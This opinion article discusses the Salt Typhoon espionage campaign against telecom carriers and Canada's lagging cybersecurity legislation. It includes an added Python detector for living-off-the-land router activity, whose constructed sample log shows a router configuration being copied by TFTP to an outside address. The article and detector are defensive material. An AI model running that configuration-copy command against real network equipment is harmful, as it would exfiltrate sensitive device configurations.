Cyberthreats: Will We Wait for a Disaster Before Taking Action?

As military conflicts take centre stage and diplomatic tensions are accompanied by barely concealed hostility, it is essential to remember that these often acrimonious relationships inevitably involve large-scale cyberwar.

While silent and invisible to us, these cyber conflicts are extremely well-funded and occur 24 hours a day globally.

The recent attack by Salt Typhoon, a state-supported cybercriminal group in China, illustrates the scale of modern cyber conflict. The group specializes in cyber-espionage and targets critical infrastructure such as telecommunications networks. These attacks threaten citizens’ sensitive data and undermine the economic and strategic stability of nations.

What happened?

Cyberattackers exploited existing vulnerabilities in network infrastructure, particularly in Cisco-manufactured equipment. The group uses advanced techniques to maintain persistent and discreet access to compromised networks, making detection extremely difficult. For example, they use an approach called “living off the land,” which relies on legitimate software already present on the systems rather than on malware of their own. This method lets them slip past traditional security solutions. It is like knowing that a thief is in your house, listening to you, with access to your cell phone, but not being able to locate or expel them.

They also deployed GhostSpider malware, equipped with sophisticated mechanisms to maintain extended access while remaining discreet. This program uses techniques such as in-memory execution, further complicating its detection by conventional antivirus.
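Because “living off the land” means the tools involved are themselves legitimate, defenders cannot rely on spotting a malicious file; they have to spot legitimate tools being used in an unusual context (by an unexpected account, from an unexpected address, outside maintenance hours, or sending configuration data somewhere it should not go). The following script is an added illustration written for this article, not code from the article’s author or from any vendor or investigation. The log format, device name, accounts, addresses and baseline are all constructed for the example; they describe no real network.

```python
"""
Added example: a small baseline-based detector for "living-off-the-land"
activity on network equipment. The intruder reuses built-in administrative
tools, so detection rests on context rather than on the tool itself.
Every host, account, address and log line below is constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime

# Constructed audit-log format (hypothetical, not a real device's syslog):
# "<ISO time> <host> user=<account> src=<ip> tool=<name> args=<free text>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) user=(?P<user>\S+) src=(?P<src>\S+) "
    r"tool=(?P<tool>\S+) args=(?P<args>.*)$"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass(frozen=True)
class Event:
    ts: datetime
    host: str
    user: str
    src: str
    tool: str
    args: str


def parse(line: str) -> Event | None:
    """Parse one constructed audit line; return None for lines we do not understand."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return Event(datetime.fromisoformat(d["ts"]), d["host"], d["user"],
                 d["src"], d["tool"], d["args"])


# Per-host baseline (constructed): which accounts administer the device, from
# which address range, and during which local hours configuration work is normal.
BASELINE = {
    "edge-rtr-01": {"users": {"netops"}, "src_prefix": "10.10.0.", "hours": range(8, 18)},
}

# Built-in tools that are legitimate on the device but are also what an intruder
# would reuse to read or copy configuration: the "land" in living off the land.
SENSITIVE_TOOLS = {"copy", "show-run", "tftp"}


def foreign_addresses(args: str, admin_prefix: str) -> list[str]:
    """IPv4 addresses mentioned in the command that lie outside the admin range."""
    return [ip for ip in IPV4_RE.findall(args) if not ip.startswith(admin_prefix)]


def score(ev: Event, baseline=BASELINE) -> list[str]:
    """Return the reasons an event deviates from baseline (empty list = normal)."""
    b = baseline.get(ev.host)
    if b is None:
        return ["host has no baseline"]
    if ev.tool not in SENSITIVE_TOOLS:
        return []  # ordinary commands are not scored in this illustration
    reasons = []
    if ev.user not in b["users"]:
        reasons.append(f"unexpected account {ev.user}")
    if not ev.src.startswith(b["src_prefix"]):
        reasons.append(f"source {ev.src} outside admin range")
    if ev.ts.hour not in b["hours"]:
        reasons.append(f"outside maintenance window ({ev.ts.hour:02d}:00)")
    foreign = foreign_addresses(ev.args, b["src_prefix"])
    if foreign:
        reasons.append(f"configuration sent toward {', '.join(foreign)}")
    return reasons


def detect(lines, baseline=BASELINE) -> list[tuple[Event, list[str]]]:
    """Run every parseable line through score(); keep only the deviating events."""
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        reasons = score(ev, baseline)
        if reasons:
            alerts.append((ev, reasons))
    return alerts


# Constructed sample log: two routine backups by the on-call engineer, one
# off-hours config copy by an unexpected account to an outside address, one ping.
SAMPLE_LOG = """\
2025-01-14T09:12:03 edge-rtr-01 user=netops src=10.10.0.5 tool=show-run args=
2025-01-14T09:15:41 edge-rtr-01 user=netops src=10.10.0.5 tool=copy args=running-config tftp://10.10.0.20/backup.cfg
2025-01-14T03:07:55 edge-rtr-01 user=svc_backup src=172.16.4.9 tool=copy args=running-config tftp://198.51.100.7/r.cfg
2025-01-14T11:02:10 edge-rtr-01 user=netops src=10.10.0.5 tool=ping args=10.10.0.1
"""

if __name__ == "__main__":
    for ev, reasons in detect(SAMPLE_LOG.splitlines()):
        print(f"{ev.ts.isoformat()} {ev.host} {ev.tool} by {ev.user}: " + "; ".join(reasons))
```

The point of the design is that the same command (`copy running-config` to a TFTP server) is scored as normal in one line and as an alert in another; nothing about the tool changed, only its context. Real deployments would build the baseline from weeks of observed activity rather than hand-writing it, and would feed device syslog or AAA accounting records instead of the constructed format used here.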

Who is compromised?

At least eight telecommunications companies were targeted, including AT&T, Verizon, T-Mobile and Lumen Technologies. These intrusions allowed attackers to access call metadata, revealing sensitive information about the communications of many Americans, including senior government officials and politicians.

It would be surprising if Salt Typhoon limited itself to U.S. companies. Canadian companies using the same technologies are attractive targets, especially since the risk of retaliation is often perceived as lower.

What information was compromised?

Salt Typhoon’s cyberattacks compromised strategic data. This includes call metadata: the source and destination of each call, as well as the time and duration of communications. In some cases, attackers also managed to access the content of communications, such as calls and text messages, exposing highly confidential information. It is easy to imagine that communications from politicians, military personnel or financiers may be of strategic interest to a rival nation.

What are the attackers’ goals?

The sponsors behind Salt Typhoon have strategic goals focused primarily on espionage and destabilization. The group aims to collect sensitive information about government officials, political figures and strategically important organizations. By compromising critical infrastructure, such as telecommunications networks, attackers also seek to prepare for potential disruptions when conflict or crisis occurs. These actions aim to weaken target countries’ response capacities while reinforcing the strategic advantage of their sponsors. One might think that the Salt Typhoon sponsors are followers of the Latin saying “Si vis pacem, para bellum,” meaning “If you want peace, prepare for war.”

How did the authorities respond?

The authorities have strengthened their cybersecurity measures in response to these successful attacks. In the United States, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have issued guidelines to encourage telecommunications companies to address vulnerabilities exploited by attackers. The Federal Communications Commission (FCC) has proposed new rules requiring annual certifications to ensure critical infrastructure safety. In addition, calls for increased network traffic monitoring and encrypted communication tools have been launched to reduce the risk of sensitive data exfiltration. These measures aim to reduce the impact of attacks.

The affected telecommunications companies are working to remove this threat from their infrastructure. However, these companies have not yet “fully removed the Chinese actors” from their networks, according to U.S. officials. The U.S. authorities, including the FBI and CISA, are working closely with these companies to assess the extent of compromise and implement remedial measures. Despite these efforts, the attack’s complexity and sophistication make the clean-up process long and arduous, and it is difficult to predict when full removal will be achieved.

Are we prepared for cyberattacks like the Salt Typhoon?

The Salt Typhoon attack raises critical questions about our ability to protect our critical infrastructure against sophisticated threats. This criminal group has demonstrated how vital networks, such as telecommunications, can be infiltrated and exploited without detection for months. If these vulnerabilities exist in the United States, a country with advanced cybersecurity capabilities, it is legitimate to question whether Canada is sufficiently prepared for such an eventuality.

Critical infrastructure, whether telecommunications, energy networks or financial systems, is the backbone of our modern societies. However, its security often seems to be put on the back burner in the face of other priorities. While the Canadian Centre for Cyber Security (CCCS) has published recommendations and collaborated with international partners on preventative measures, current efforts appear insufficient to address the scale of the threats. Actions remain reactive rather than proactive, leaving a dangerous margin for determined and well-funded attackers.

The real question is, do we have to wait for a digital catastrophe before we take the security of our critical infrastructure seriously? Unfortunately, history shows that significant security actions often occur only after a major crisis. The Salt Typhoon attack could serve as a wake-up call, but the lack of specific impact data in Canada may dilute the sense of urgency. Yet the consequences of such an attack here could be devastating, crippling communications, trade, and even essential services like health care.

To avoid disaster, Canada must invest more in protecting its critical infrastructure. This includes not only strengthening technology systems, but also improving collaboration between the public and private sectors, increasing training of cybersecurity experts, and establishing rapid response protocols. Waiting will only exacerbate the risks. Taking action now is necessary to ensure our society’s resilience to increasingly sophisticated threats. Salt Typhoon is probably the tip of the iceberg.

Bill C-26 and Bill C-27 are perfect examples of the worrisome inertia surrounding legislative efforts on cybersecurity in Canada. Bill C-26, introduced in 2022, aims to protect vital cyber systems by strengthening security obligations for critical infrastructure, such as telecommunications and energy. Also introduced in 2022, Bill C-27 aims to modernize the legislative privacy framework and regulate artificial intelligence. These initiatives, while essential, have languished in the legislative process for years.

These two examples highlight a broader problem: the inability to respond quickly to increasing threats. If legislation such as Bill C-26, crucial to critical infrastructure resilience, takes years to pass, it will probably be obsolete before it even comes into force. This disconnect between evolving cyber threats and slow legislative responses raises a worrisome question: Will we wait until a digital disaster strikes before taking serious action? These delays only add to the sense of urgency. Canada must overcome this inertia because every day of inaction makes us more vulnerable to increasingly sophisticated adversaries.